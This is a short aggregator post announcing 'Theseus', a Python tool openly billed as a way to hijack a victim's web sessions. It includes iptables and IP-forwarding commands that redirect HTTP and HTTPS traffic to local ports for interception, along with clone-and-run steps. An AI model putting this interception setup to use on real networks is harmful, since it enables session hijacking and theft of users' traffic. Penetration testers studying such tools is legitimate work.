Quantcast
Channel: Penetration Test – Security List Network™
Viewing all articles
Browse latest Browse all 1152

Theseus – a tool to pwn web sessions.

$
0
0

Theseus is a python2 script for Control A Victims Web Sessions.
Dependencies:
+ Python 2.7.x
+ All Linux Operating System Support

Theseus

TODO:
– Configure kernel and iptables for the attack:
echo 1 > /proc/sys/net/ipv4/ip_forward;\
iptables –flush;\
iptables –flush -t nat;\
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 9000;\
iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 4444;

Usage:

git clone https://github.com/Dylan-halls/Theseus && cd Theseus
cd src
python Theseus.py -h

Source: https://github.com/Dylan-halls


Viewing all articles
Browse latest Browse all 1152

Trending Articles